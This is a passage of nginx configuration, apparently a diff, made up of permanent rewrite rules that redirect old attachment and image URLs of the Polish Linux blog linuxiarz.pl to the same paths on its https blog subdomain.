^/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/2016-04-16-14_25_14-teamspeak-3/$ https://blog.linuxiarz.pl/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/2016-04-16-14_25_14-teamspeak-3/ permanent; +rewrite ^/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/db3/$ https://blog.linuxiarz.pl/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/db3/ permanent; +rewrite ^/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/db2/$ https://blog.linuxiarz.pl/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/db2/ permanent; +rewrite ^/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/db1/$ https://blog.linuxiarz.pl/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/db1/ permanent; +rewrite ^/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/sinus_ts1/$ https://blog.linuxiarz.pl/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/sinus_ts1/ permanent; +rewrite ^/2032/tengine-chinski-zmodyfikowany-serwer-nginx/logo-3/$ https://blog.linuxiarz.pl/2032/tengine-chinski-zmodyfikowany-serwer-nginx/logo-3/ permanent; +rewrite ^/2023/wirtualizacja-kvm-interfejs-web/pic_disp-php/$ https://blog.linuxiarz.pl/2023/wirtualizacja-kvm-interfejs-web/pic_disp-php/ permanent; +rewrite ^/1992/wydajny-i-szybki-sklep-prestashop/linux-ubuntu-nginx-mariadb-php-presta/$ https://blog.linuxiarz.pl/1992/wydajny-i-szybki-sklep-prestashop/linux-ubuntu-nginx-mariadb-php-presta/ permanent; +rewrite ^/1966/mailpile-klient-imap-z-obsluga-pgp/logo-color/$ https://blog.linuxiarz.pl/1966/mailpile-klient-imap-z-obsluga-pgp/logo-color/ permanent; +rewrite ^/1956/apache-2-4-18-na-debian-ubuntu/httpdlogowide/$ https://blog.linuxiarz.pl/1956/apache-2-4-18-na-debian-ubuntu/httpdlogowide/ permanent; +rewrite ^/1921/wydajny-wordpress-na-wlasnym-serwerze/ip-strefa/$ https://blog.linuxiarz.pl/1921/wydajny-wordpress-na-wlasnym-serwerze/ip-strefa/ permanent; +rewrite ^/1921/wydajny-wordpress-na-wlasnym-serwerze/wp-ftp/$ https://blog.linuxiarz.pl/1921/wydajny-wordpress-na-wlasnym-serwerze/wp-ftp/ permanent; +rewrite ^/1921/wydajny-wordpress-na-wlasnym-serwerze/linux-ubuntu-nginx-mysql-php-wordpress-3/$ https://blog.linuxiarz.pl/1921/wydajny-wordpress-na-wlasnym-serwerze/linux-ubuntu-nginx-mysql-php-wordpress-3/ permanent; +rewrite ^/1921/wydajny-wordpress-na-wlasnym-serwerze/linux-ubuntu-nginx-mysql-php-wordpress-2/$ https://blog.linuxiarz.pl/1921/wydajny-wordpress-na-wlasnym-serwerze/linux-ubuntu-nginx-mysql-php-wordpress-2/ permanent; +rewrite ^/1921/wydajny-wordpress-na-wlasnym-serwerze/wp2/$ https://blog.linuxiarz.pl/1921/wydajny-wordpress-na-wlasnym-serwerze/wp2/ permanent; +rewrite ^/1921/wydajny-wordpress-na-wlasnym-serwerze/wp1/$ https://blog.linuxiarz.pl/1921/wydajny-wordpress-na-wlasnym-serwerze/wp1/ permanent; +rewrite ^/1921/wydajny-wordpress-na-wlasnym-serwerze/spawn/$ https://blog.linuxiarz.pl/1921/wydajny-wordpress-na-wlasnym-serwerze/spawn/ permanent; +rewrite ^/1921/wydajny-wordpress-na-wlasnym-serwerze/serwer/$ https://blog.linuxiarz.pl/1921/wydajny-wordpress-na-wlasnym-serwerze/serwer/ permanent; +rewrite ^/1899/cozy-cloud-twoja-chmura-w-sieci/cozy-logo/$ https://blog.linuxiarz.pl/1899/cozy-cloud-twoja-chmura-w-sieci/cozy-logo/ permanent; +rewrite ^/1896/htop-2-0-zostal-opublikowany/selection_104/$ https://blog.linuxiarz.pl/1896/htop-2-0-zostal-opublikowany/selection_104/ permanent; +rewrite ^/1874/centos-6-nginx-mariadb-phpmyadmin/centos-rhel-6-nginx/$ https://blog.linuxiarz.pl/1874/centos-6-nginx-mariadb-phpmyadmin/centos-rhel-6-nginx/ permanent; +rewrite ^/1854/nginx-1-9-10-i-nginx-1-8-1-dla-debian-ubuntu-centos-fedora-opensuse/la36089logo/$ https://blog.linuxiarz.pl/1854/nginx-1-9-10-i-nginx-1-8-1-dla-debian-ubuntu-centos-fedora-opensuse/la36089logo/ permanent; +rewrite ^/1834/instalacja-gentoofuntoo/gentoo_ker1/$ https://blog.linuxiarz.pl/1834/instalacja-gentoofuntoo/gentoo_ker1/ permanent; +rewrite ^/1834/instalacja-gentoofuntoo/gentoo_ker/$ https://blog.linuxiarz.pl/1834/instalacja-gentoofuntoo/gentoo_ker/ permanent; +rewrite ^/1834/instalacja-gentoofuntoo/gentoo_part/$ https://blog.linuxiarz.pl/1834/instalacja-gentoofuntoo/gentoo_part/ permanent; +rewrite ^/1834/instalacja-gentoofuntoo/gentoo_3/$ https://blog.linuxiarz.pl/1834/instalacja-gentoofuntoo/gentoo_3/ permanent; +rewrite ^/1834/instalacja-gentoofuntoo/gentoo_2/$ https://blog.linuxiarz.pl/1834/instalacja-gentoofuntoo/gentoo_2/ permanent; +rewrite ^/1834/instalacja-gentoofuntoo/gentoo_1/$ https://blog.linuxiarz.pl/1834/instalacja-gentoofuntoo/gentoo_1/ permanent; +rewrite ^/1834/instalacja-gentoofuntoo/rsz_maxresdefault-2/$ https://blog.linuxiarz.pl/1834/instalacja-gentoofuntoo/rsz_maxresdefault-2/ permanent; +rewrite ^/1827/routing-w-multimedii/network/$ https://blog.linuxiarz.pl/1827/routing-w-multimedii/network/ permanent; +rewrite ^/1820/usuwanie-starych-kerneli-w-ubuntu/kernel/$ https://blog.linuxiarz.pl/1820/usuwanie-starych-kerneli-w-ubuntu/kernel/ permanent; +rewrite ^/1807/prywatny-serwer-world-of-warcraft-na-systemie-linux/wowscrnshot_122815_142001-3/$ https://blog.linuxiarz.pl/1807/prywatny-serwer-world-of-warcraft-na-systemie-linux/wowscrnshot_122815_142001-3/ permanent; +rewrite ^/1807/prywatny-serwer-world-of-warcraft-na-systemie-linux/wowscrnshot_122815_142001/$ https://blog.linuxiarz.pl/1807/prywatny-serwer-world-of-warcraft-na-systemie-linux/wowscrnshot_122815_142001/ permanent; +rewrite ^/1807/prywatny-serwer-world-of-warcraft-na-systemie-linux/tcp_logo_1/$ https://blog.linuxiarz.pl/1807/prywatny-serwer-world-of-warcraft-na-systemie-linux/tcp_logo_1/ permanent; +rewrite ^/1802/nginx-z-dodatkami-na-freebsd/ngx_php_mysql/$ https://blog.linuxiarz.pl/1802/nginx-z-dodatkami-na-freebsd/ngx_php_mysql/ permanent; +rewrite ^/1802/nginx-z-dodatkami-na-freebsd/logo-full-2/$ https://blog.linuxiarz.pl/1802/nginx-z-dodatkami-na-freebsd/logo-full-2/ permanent; +rewrite ^/1796/opensuse-i-serwer-www-z-nginx/nginx_os_ngx/$ https://blog.linuxiarz.pl/1796/opensuse-i-serwer-www-z-nginx/nginx_os_ngx/ permanent; +rewrite ^/1781/serwer-www-w-pigulce-centos-7/cloud/$ https://blog.linuxiarz.pl/1781/serwer-www-w-pigulce-centos-7/cloud/ permanent; +rewrite ^/1781/serwer-www-w-pigulce-centos-7/c_p_ngx_pma_mdb_ap/$ https://blog.linuxiarz.pl/1781/serwer-www-w-pigulce-centos-7/c_p_ngx_pma_mdb_ap/ permanent; +rewrite ^/722/kompilacja-minidlna-ze-zrodel/minidlna-on-ubuntu-ft/$ https://blog.linuxiarz.pl/722/kompilacja-minidlna-ze-zrodel/minidlna-on-ubuntu-ft/ permanent; +rewrite ^/1761/seagate-i-smutna-historia/20151205_134304/$ https://blog.linuxiarz.pl/1761/seagate-i-smutna-historia/20151205_134304/ permanent; +rewrite ^/1761/seagate-i-smutna-historia/20151205_134254/$ https://blog.linuxiarz.pl/1761/seagate-i-smutna-historia/20151205_134254/ permanent; +rewrite ^/1761/seagate-i-smutna-historia/20151205_134247/$ https://blog.linuxiarz.pl/1761/seagate-i-smutna-historia/20151205_134247/ permanent; +rewrite ^/1761/seagate-i-smutna-historia/20151205_111120/$ https://blog.linuxiarz.pl/1761/seagate-i-smutna-historia/20151205_111120/ permanent; +rewrite ^/1761/seagate-i-smutna-historia/20151205_111101/$ https://blog.linuxiarz.pl/1761/seagate-i-smutna-historia/20151205_111101/ permanent; +rewrite ^/1761/seagate-i-smutna-historia/smartctl/$ https://blog.linuxiarz.pl/1761/seagate-i-smutna-historia/smartctl/ permanent; +rewrite ^/1761/seagate-i-smutna-historia/sdatemp-year/$ https://blog.linuxiarz.pl/1761/seagate-i-smutna-historia/sdatemp-year/ permanent; +rewrite ^/1761/seagate-i-smutna-historia/siec1/$ https://blog.linuxiarz.pl/1761/seagate-i-smutna-historia/siec1/ permanent; +rewrite ^/1748/instalacja-klucza-dkim-i-amavis/amavis-2/$ https://blog.linuxiarz.pl/1748/instalacja-klucza-dkim-i-amavis/amavis-2/ permanent; +rewrite ^/1745/xcache-akcelerator-php/xcache/$ https://blog.linuxiarz.pl/1745/xcache-akcelerator-php/xcache/ permanent; +rewrite ^/1738/kompilacja-php-5-6-15-z-modulami/php_logo/$ https://blog.linuxiarz.pl/1738/kompilacja-php-5-6-15-z-modulami/php_logo/ permanent; +rewrite ^/1732/centos-7-i-nginx-mariadb-php5-fpm/c_p_ngx_pma_mdb/$ https://blog.linuxiarz.pl/1732/centos-7-i-nginx-mariadb-php5-fpm/c_p_ngx_pma_mdb/ permanent; +rewrite ^/1723/fedora-i-nginx-z-google-pagespeed/f_p_n/$ https://blog.linuxiarz.pl/1723/fedora-i-nginx-z-google-pagespeed/f_p_n/ permanent; +rewrite ^/1713/downgrade-systemu-windows-8-1-enterprise-do-windows-8-1-pro/windows_8_enterprise_downgrade_pro/$ https://blog.linuxiarz.pl/1713/downgrade-systemu-windows-8-1-enterprise-do-windows-8-1-pro/windows_8_enterprise_downgrade_pro/ permanent; +rewrite ^/1694/lighttpd-z-nginx-i-varnishem-na-debian-8/l_v_n_d/$ https://blog.linuxiarz.pl/1694/lighttpd-z-nginx-i-varnishem-na-debian-8/l_v_n_d/ permanent; +rewrite ^/1688/lighttpd-z-nginx-i-varnishem-na-ubuntu/l_v_n/$ https://blog.linuxiarz.pl/1688/lighttpd-z-nginx-i-varnishem-na-ubuntu/l_v_n/ permanent; +rewrite ^/1684/litespeed-instalacja-na-ubuntu-15-04/lt_o/$ https://blog.linuxiarz.pl/1684/litespeed-instalacja-na-ubuntu-15-04/lt_o/ permanent; +rewrite ^/1665/php7-rc6-na-debian-8-jessie-testujemy/php7/$ https://blog.linuxiarz.pl/1665/php7-rc6-na-debian-8-jessie-testujemy/php7/ permanent; +rewrite ^/1665/php7-rc6-na-debian-8-jessie-testujemy/php7-logo/$ https://blog.linuxiarz.pl/1665/php7-rc6-na-debian-8-jessie-testujemy/php7-logo/ permanent; +rewrite ^/1640/serwer-www-w-pigulce-na-debian-8/d_www/$ https://blog.linuxiarz.pl/1640/serwer-www-w-pigulce-na-debian-8/d_www/ permanent; +rewrite ^/1633/nowa-wersja-nginx-1-9-6/nginx-logo/$ https://blog.linuxiarz.pl/1633/nowa-wersja-nginx-1-9-6/nginx-logo/ permanent; +rewrite ^/383/manager-pobierania-aria2-konfiguracja/arai2/$ https://blog.linuxiarz.pl/383/manager-pobierania-aria2-konfiguracja/arai2/ permanent; +rewrite ^/383/manager-pobierania-aria2-konfiguracja/aria/$ https://blog.linuxiarz.pl/383/manager-pobierania-aria2-konfiguracja/aria/ permanent; +rewrite ^/1618/ubuntu-serwer-www-w-pigulce/www_u_p1/$ https://blog.linuxiarz.pl/1618/ubuntu-serwer-www-w-pigulce/www_u_p1/ permanent; +rewrite ^/1612/nginx-1-8-0-vts-pagespeed-na-debian-7/n_d7/$ https://blog.linuxiarz.pl/1612/nginx-1-8-0-vts-pagespeed-na-debian-7/n_d7/ permanent; +rewrite ^/1586/ubuntu-debian-i-inne-kompilacja-nginx/nginx_1/$ https://blog.linuxiarz.pl/1586/ubuntu-debian-i-inne-kompilacja-nginx/nginx_1/ permanent; +rewrite ^/1571/mailcow-system-pocztowy-w-10-minut/screenshot_7-2/$ https://blog.linuxiarz.pl/1571/mailcow-system-pocztowy-w-10-minut/screenshot_7-2/ permanent; +rewrite ^/1571/mailcow-system-pocztowy-w-10-minut/screenshot_4/$ https://blog.linuxiarz.pl/1571/mailcow-system-pocztowy-w-10-minut/screenshot_4/ permanent; +rewrite ^/1571/mailcow-system-pocztowy-w-10-minut/screenshot_3-2/$ https://blog.linuxiarz.pl/1571/mailcow-system-pocztowy-w-10-minut/screenshot_3-2/ permanent; +rewrite ^/1571/mailcow-system-pocztowy-w-10-minut/cow_mail/$ https://blog.linuxiarz.pl/1571/mailcow-system-pocztowy-w-10-minut/cow_mail/ permanent; +rewrite ^/linuxiarz1-3/$ https://blog.linuxiarz.pl/linuxiarz1-3/ permanent; +rewrite ^/1x1/$ https://blog.linuxiarz.pl/1x1/ permanent; +rewrite ^/linuxiarz1-2/$ https://blog.linuxiarz.pl/linuxiarz1-2/ permanent; +rewrite ^/m_bb/$ https://blog.linuxiarz.pl/m_bb/ permanent; +rewrite ^/ins_6/$ https://blog.linuxiarz.pl/ins_6/ permanent; +rewrite ^/ins_5/$ https://blog.linuxiarz.pl/ins_5/ permanent; +rewrite ^/ins_4/$ https://blog.linuxiarz.pl/ins_4/ permanent; +rewrite ^/ins_3/$ https://blog.linuxiarz.pl/ins_3/ permanent; +rewrite ^/ins_2/$ https://blog.linuxiarz.pl/ins_2/ permanent; +rewrite ^/ins_1/$ https://blog.linuxiarz.pl/ins_1/ permanent; +rewrite ^/1526/instalacja-php-5-6-14-na-ubuntu-15-04/php56/$ https://blog.linuxiarz.pl/1526/instalacja-php-5-6-14-na-ubuntu-15-04/php56/ permanent; +rewrite ^/1519/apache2-nginx-varnish-na-ubuntu-15-04/linux-ubuntu-nginx-mysql-php-wordpress/$ https://blog.linuxiarz.pl/1519/apache2-nginx-varnish-na-ubuntu-15-04/linux-ubuntu-nginx-mysql-php-wordpress/ permanent; +rewrite ^/1499/apache2-nginx-varnish-na-debianie-8/attachment/70996/$ https://blog.linuxiarz.pl/1499/apache2-nginx-varnish-na-debianie-8/attachment/70996/ permanent; +rewrite ^/1446/lighttpd-z-php5-fpm-varnishem-i-mariadb-na-debianie-8/filezilla1/$ https://blog.linuxiarz.pl/1446/lighttpd-z-php5-fpm-varnishem-i-mariadb-na-debianie-8/filezilla1/ permanent; +rewrite ^/1499/apache2-nginx-varnish-na-debianie-8/nginx-apache/$ https://blog.linuxiarz.pl/1499/apache2-nginx-varnish-na-debianie-8/nginx-apache/ permanent; +rewrite ^/1489/maradns-lekki-i-prosty-serwer-dns/dns/$ https://blog.linuxiarz.pl/1489/maradns-lekki-i-prosty-serwer-dns/dns/ permanent; +rewrite ^/1479/prestashop-na-nginx-szybkie-i-bezproblemowe/prestashop-nginx-300x199/$ https://blog.linuxiarz.pl/1479/prestashop-na-nginx-szybkie-i-bezproblemowe/prestashop-nginx-300x199/ permanent; +rewrite ^/1472/varnish-4-cache-ktory-nie-gryzie/varnish4_banner/$ https://blog.linuxiarz.pl/1472/varnish-4-cache-ktory-nie-gryzie/varnish4_banner/ permanent; +rewrite ^/1465/apache-2-4-10-ubuntu-15-04-i-googlepagespeed/screenshot_2-2/$ https://blog.linuxiarz.pl/1465/apache-2-4-10-ubuntu-15-04-i-googlepagespeed/screenshot_2-2/ permanent; +rewrite ^/1465/apache-2-4-10-ubuntu-15-04-i-googlepagespeed/screenshot_1-2/$ https://blog.linuxiarz.pl/1465/apache-2-4-10-ubuntu-15-04-i-googlepagespeed/screenshot_1-2/ permanent; +rewrite ^/1465/apache-2-4-10-ubuntu-15-04-i-googlepagespeed/ap/$ https://blog.linuxiarz.pl/1465/apache-2-4-10-ubuntu-15-04-i-googlepagespeed/ap/ permanent; +rewrite ^/1458/drupal-i-nginx/ng_dr/$ https://blog.linuxiarz.pl/1458/drupal-i-nginx/ng_dr/ permanent; +rewrite ^/1451/uruchomienie-systemu-cms-drupal-na-lighttpd/title_0/$ https://blog.linuxiarz.pl/1451/uruchomienie-systemu-cms-drupal-na-lighttpd/title_0/ permanent; +rewrite ^/1446/lighttpd-z-php5-fpm-varnishem-i-mariadb-na-debianie-8/log_d_m_l_v/$ https://blog.linuxiarz.pl/1446/lighttpd-z-php5-fpm-varnishem-i-mariadb-na-debianie-8/log_d_m_l_v/ permanent; +rewrite ^/1446/lighttpd-z-php5-fpm-varnishem-i-mariadb-na-debianie-8/naglowki/$ https://blog.linuxiarz.pl/1446/lighttpd-z-php5-fpm-varnishem-i-mariadb-na-debianie-8/naglowki/ permanent; +rewrite ^/1442/nginx-na-debianie-7-i-8-out-of-the-box/debian-nginx-590x174/$ https://blog.linuxiarz.pl/1442/nginx-na-debianie-7-i-8-out-of-the-box/debian-nginx-590x174/ permanent; +rewrite ^/1435/nginx-na-ubuntu-14-04-15-04-i-15-10-out-of-the-box/u_n/$ https://blog.linuxiarz.pl/1435/nginx-na-ubuntu-14-04-15-04-i-15-10-out-of-the-box/u_n/ permanent; +rewrite ^/1425/postfix-blokada-nadawcow-i-domen/no-spam/$ https://blog.linuxiarz.pl/1425/postfix-blokada-nadawcow-i-domen/no-spam/ permanent; +rewrite ^/1425/postfix-blokada-nadawcow-i-domen/postfix_x/$ https://blog.linuxiarz.pl/1425/postfix-blokada-nadawcow-i-domen/postfix_x/ permanent; +rewrite ^/1421/aktualizacja-debiana-8-jessie-do-debiana-stretch/debian-gnu-linux-9-0-will-be-named-stretch-479382-2/$ https://blog.linuxiarz.pl/1421/aktualizacja-debiana-8-jessie-do-debiana-stretch/debian-gnu-linux-9-0-will-be-named-stretch-479382-2/ permanent; +rewrite ^/1403/ubuntu-14-04-i-zentyal/screenshot_9/$ https://blog.linuxiarz.pl/1403/ubuntu-14-04-i-zentyal/screenshot_9/ permanent; +rewrite ^/1403/ubuntu-14-04-i-zentyal/screenshot_8/$ https://blog.linuxiarz.pl/1403/ubuntu-14-04-i-zentyal/screenshot_8/ permanent; +rewrite ^/1403/ubuntu-14-04-i-zentyal/screenshot_7/$ https://blog.linuxiarz.pl/1403/ubuntu-14-04-i-zentyal/screenshot_7/ permanent; +rewrite ^/1403/ubuntu-14-04-i-zentyal/screenshot_6/$ https://blog.linuxiarz.pl/1403/ubuntu-14-04-i-zentyal/screenshot_6/ permanent; +rewrite ^/1403/ubuntu-14-04-i-zentyal/screenshot_5/$ https://blog.linuxiarz.pl/1403/ubuntu-14-04-i-zentyal/screenshot_5/ permanent; +rewrite ^/1403/ubuntu-14-04-i-zentyal/screenshot_3/$ https://blog.linuxiarz.pl/1403/ubuntu-14-04-i-zentyal/screenshot_3/ permanent; +rewrite ^/1403/ubuntu-14-04-i-zentyal/screenshot_2/$ https://blog.linuxiarz.pl/1403/ubuntu-14-04-i-zentyal/screenshot_2/ permanent; +rewrite ^/1403/ubuntu-14-04-i-zentyal/zentyallogo_thumb/$ https://blog.linuxiarz.pl/1403/ubuntu-14-04-i-zentyal/zentyallogo_thumb/ permanent; +rewrite ^/1390/postfix-sprawdzanie-rekordow-spf-nadawcow/postfix_logo/$ https://blog.linuxiarz.pl/1390/postfix-sprawdzanie-rekordow-spf-nadawcow/postfix_logo/ permanent; +rewrite ^/1390/postfix-sprawdzanie-rekordow-spf-nadawcow/policy4/$ https://blog.linuxiarz.pl/1390/postfix-sprawdzanie-rekordow-spf-nadawcow/policy4/ permanent; +rewrite ^/1390/postfix-sprawdzanie-rekordow-spf-nadawcow/policy3/$ https://blog.linuxiarz.pl/1390/postfix-sprawdzanie-rekordow-spf-nadawcow/policy3/ permanent; +rewrite ^/1390/postfix-sprawdzanie-rekordow-spf-nadawcow/policy2/$ https://blog.linuxiarz.pl/1390/postfix-sprawdzanie-rekordow-spf-nadawcow/policy2/ permanent; +rewrite ^/1390/postfix-sprawdzanie-rekordow-spf-nadawcow/policy1/$ https://blog.linuxiarz.pl/1390/postfix-sprawdzanie-rekordow-spf-nadawcow/policy1/ permanent; +rewrite ^/1385/nginx-1-9-4-z-modulem-vts-czyli-statystyki-vhosta/logo_gree/$ https://blog.linuxiarz.pl/1385/nginx-1-9-4-z-modulem-vts-czyli-statystyki-vhosta/logo_gree/ permanent; +rewrite ^/1385/nginx-1-9-4-z-modulem-vts-czyli-statystyki-vhosta/vts/$ https://blog.linuxiarz.pl/1385/nginx-1-9-4-z-modulem-vts-czyli-statystyki-vhosta/vts/ permanent; +rewrite ^/1376/minimalistyczne-apache-2-4-16-na-ubuntu-debianie/apache_2-4-16/$ https://blog.linuxiarz.pl/1376/minimalistyczne-apache-2-4-16-na-ubuntu-debianie/apache_2-4-16/ permanent; +rewrite ^/linuxiarz1/$ https://blog.linuxiarz.pl/linuxiarz1/ permanent; +rewrite ^/1363/nginx-1-9-4-z-obsluga-protokolu-http2/http_2/$ https://blog.linuxiarz.pl/1363/nginx-1-9-4-z-obsluga-protokolu-http2/http_2/ permanent; +rewrite ^/1363/nginx-1-9-4-z-obsluga-protokolu-http2/nginx_http2/$ https://blog.linuxiarz.pl/1363/nginx-1-9-4-z-obsluga-protokolu-http2/nginx_http2/ permanent; +rewrite ^/1356/centos-7-instalacja-serwera-ftp/centosftp/$ https://blog.linuxiarz.pl/1356/centos-7-instalacja-serwera-ftp/centosftp/ permanent; +rewrite ^/1348/archlinux-jako-serwer-hostingowy-nginx-mariadb-ftp/archlinux/$ https://blog.linuxiarz.pl/1348/archlinux-jako-serwer-hostingowy-nginx-mariadb-ftp/archlinux/ permanent; +rewrite ^/1348/archlinux-jako-serwer-hostingowy-nginx-mariadb-ftp/arch-linux-logo/$ https://blog.linuxiarz.pl/1348/archlinux-jako-serwer-hostingowy-nginx-mariadb-ftp/arch-linux-logo/ permanent; +rewrite ^/1337/centos-7-nginx-php5-ftp-kompletny-serwer-www/cntos-2/$ https://blog.linuxiarz.pl/1337/centos-7-nginx-php5-ftp-kompletny-serwer-www/cntos-2/ permanent; +rewrite ^/1337/centos-7-nginx-php5-ftp-kompletny-serwer-www/sftp/$ https://blog.linuxiarz.pl/1337/centos-7-nginx-php5-ftp-kompletny-serwer-www/sftp/ permanent; +rewrite ^/1331/kompilacja-nginx-1-9-4-z-modulem-pagespeed-na-centos-7/hqdefault/$ https://blog.linuxiarz.pl/1331/kompilacja-nginx-1-9-4-z-modulem-pagespeed-na-centos-7/hqdefault/ permanent; +rewrite ^/1324/upgrade-ubuntu-15-04-do-wersji-15-10/ubuntu/$ https://blog.linuxiarz.pl/1324/upgrade-ubuntu-15-04-do-wersji-15-10/ubuntu/ permanent; +rewrite ^/1324/upgrade-ubuntu-15-04-do-wersji-15-10/ubuntu_upgrade/$ https://blog.linuxiarz.pl/1324/upgrade-ubuntu-15-04-do-wersji-15-10/ubuntu_upgrade/ permanent; +rewrite ^/1315/apache-2-php5-fpm-varnish/lamp/$ https://blog.linuxiarz.pl/1315/apache-2-php5-fpm-varnish/lamp/ permanent; +rewrite ^/1308/lighttpd-z-php5-fpm-i-varnishem/lighttpd_mariadb/$ https://blog.linuxiarz.pl/1308/lighttpd-z-php5-fpm-i-varnishem/lighttpd_mariadb/ permanent; +rewrite ^/1297/lemp-ubuntu-15-04-szybko-i-bezbolesnie/lemp-2-2/$ https://blog.linuxiarz.pl/1297/lemp-ubuntu-15-04-szybko-i-bezbolesnie/lemp-2-2/ permanent; +rewrite ^/1290/hhvm-maszyna-wirtualna-z-kompilatorem-jit-dla-php/attachment/1293/$ https://blog.linuxiarz.pl/1290/hhvm-maszyna-wirtualna-z-kompilatorem-jit-dla-php/attachment/1293/ permanent; +rewrite ^/1290/hhvm-maszyna-wirtualna-z-kompilatorem-jit-dla-php/hhvm-logo/$ https://blog.linuxiarz.pl/1290/hhvm-maszyna-wirtualna-z-kompilatorem-jit-dla-php/hhvm-logo/ permanent; +rewrite ^/1267/mageia5-czyli-mandriva-w-nowej-odslonie/ss_mageia/$ https://blog.linuxiarz.pl/1267/mageia5-czyli-mandriva-w-nowej-odslonie/ss_mageia/ permanent; +rewrite ^/1267/mageia5-czyli-mandriva-w-nowej-odslonie/screenshot_1/$ https://blog.linuxiarz.pl/1267/mageia5-czyli-mandriva-w-nowej-odslonie/screenshot_1/ permanent; +rewrite ^/1267/mageia5-czyli-mandriva-w-nowej-odslonie/mageia/$ https://blog.linuxiarz.pl/1267/mageia5-czyli-mandriva-w-nowej-odslonie/mageia/ permanent; +rewrite ^/1257/ccze-koloryzacja-logow-i-prezentacja-w-html/ccze2/$ https://blog.linuxiarz.pl/1257/ccze-koloryzacja-logow-i-prezentacja-w-html/ccze2/ permanent; +rewrite ^/1257/ccze-koloryzacja-logow-i-prezentacja-w-html/ccze1/$ https://blog.linuxiarz.pl/1257/ccze-koloryzacja-logow-i-prezentacja-w-html/ccze1/ permanent; +rewrite ^/1247/gotowy-nginx-1-9-3-pagespeed-php5-fpm/sp_98957-57366-i_rc/$ https://blog.linuxiarz.pl/1247/gotowy-nginx-1-9-3-pagespeed-php5-fpm/sp_98957-57366-i_rc/ permanent; +rewrite ^/1247/gotowy-nginx-1-9-3-pagespeed-php5-fpm/mgix_maria/$ https://blog.linuxiarz.pl/1247/gotowy-nginx-1-9-3-pagespeed-php5-fpm/mgix_maria/ permanent; +rewrite ^/1247/gotowy-nginx-1-9-3-pagespeed-php5-fpm/nginxps-2/$ https://blog.linuxiarz.pl/1247/gotowy-nginx-1-9-3-pagespeed-php5-fpm/nginxps-2/ permanent; +rewrite ^/1247/gotowy-nginx-1-9-3-pagespeed-php5-fpm/uk_gt2/$ https://blog.linuxiarz.pl/1247/gotowy-nginx-1-9-3-pagespeed-php5-fpm/uk_gt2/ permanent; +rewrite ^/1247/gotowy-nginx-1-9-3-pagespeed-php5-fpm/uk_gt1/$ https://blog.linuxiarz.pl/1247/gotowy-nginx-1-9-3-pagespeed-php5-fpm/uk_gt1/ permanent; +rewrite ^/1236/wirtualne-maszyny-bridge-mode-vmware-w-ovh/mac_paste/$ https://blog.linuxiarz.pl/1236/wirtualne-maszyny-bridge-mode-vmware-w-ovh/mac_paste/ permanent; +rewrite ^/1236/wirtualne-maszyny-bridge-mode-vmware-w-ovh/edit_vm/$ https://blog.linuxiarz.pl/1236/wirtualne-maszyny-bridge-mode-vmware-w-ovh/edit_vm/ permanent; +rewrite ^/1236/wirtualne-maszyny-bridge-mode-vmware-w-ovh/vmware_mac/$ https://blog.linuxiarz.pl/1236/wirtualne-maszyny-bridge-mode-vmware-w-ovh/vmware_mac/ permanent; +rewrite ^/1236/wirtualne-maszyny-bridge-mode-vmware-w-ovh/vmac/$ https://blog.linuxiarz.pl/1236/wirtualne-maszyny-bridge-mode-vmware-w-ovh/vmac/ permanent; +rewrite ^/1236/wirtualne-maszyny-bridge-mode-vmware-w-ovh/vmware/$ https://blog.linuxiarz.pl/1236/wirtualne-maszyny-bridge-mode-vmware-w-ovh/vmware/ permanent; +rewrite ^/1231/aktualizacja-bazy-danych/maria/$ https://blog.linuxiarz.pl/1231/aktualizacja-bazy-danych/maria/ permanent; +rewrite ^/1221/kompilacja-nginx-1-9-3-google-page-speed/nginxps/$ https://blog.linuxiarz.pl/1221/kompilacja-nginx-1-9-3-google-page-speed/nginxps/ permanent; +rewrite ^/1213/aktualizacja-apache2-do-wersji-2-4-12/650_1000_apache-server/$ https://blog.linuxiarz.pl/1213/aktualizacja-apache2-do-wersji-2-4-12/650_1000_apache-server/ permanent; +rewrite ^/1213/aktualizacja-apache2-do-wersji-2-4-12/apache/$ https://blog.linuxiarz.pl/1213/aktualizacja-apache2-do-wersji-2-4-12/apache/ permanent; +rewrite ^/1201/virtualbox-na-fedora-20-21-22/oracle-virtualbox/$ https://blog.linuxiarz.pl/1201/virtualbox-na-fedora-20-21-22/oracle-virtualbox/ permanent; +rewrite ^/1201/virtualbox-na-fedora-20-21-22/zrzut-ekranu-z-2015-05-02-13-27-10/$ https://blog.linuxiarz.pl/1201/virtualbox-na-fedora-20-21-22/zrzut-ekranu-z-2015-05-02-13-27-10/ permanent; +rewrite ^/1201/virtualbox-na-fedora-20-21-22/zrzut-ekranu-z-2015-05-02-13-25-19/$ https://blog.linuxiarz.pl/1201/virtualbox-na-fedora-20-21-22/zrzut-ekranu-z-2015-05-02-13-25-19/ permanent; +rewrite ^/1201/virtualbox-na-fedora-20-21-22/zrzut-ekranu-z-2015-05-02-13-17-08/$ https://blog.linuxiarz.pl/1201/virtualbox-na-fedora-20-21-22/zrzut-ekranu-z-2015-05-02-13-17-08/ permanent; +rewrite ^/1201/virtualbox-na-fedora-20-21-22/zrzut-ekranu-z-2015-05-02-13-12-54/$ https://blog.linuxiarz.pl/1201/virtualbox-na-fedora-20-21-22/zrzut-ekranu-z-2015-05-02-13-12-54/ permanent; +rewrite ^/1201/virtualbox-na-fedora-20-21-22/zrzut-ekranu-z-2015-05-02-13-12-12/$ https://blog.linuxiarz.pl/1201/virtualbox-na-fedora-20-21-22/zrzut-ekranu-z-2015-05-02-13-12-12/ 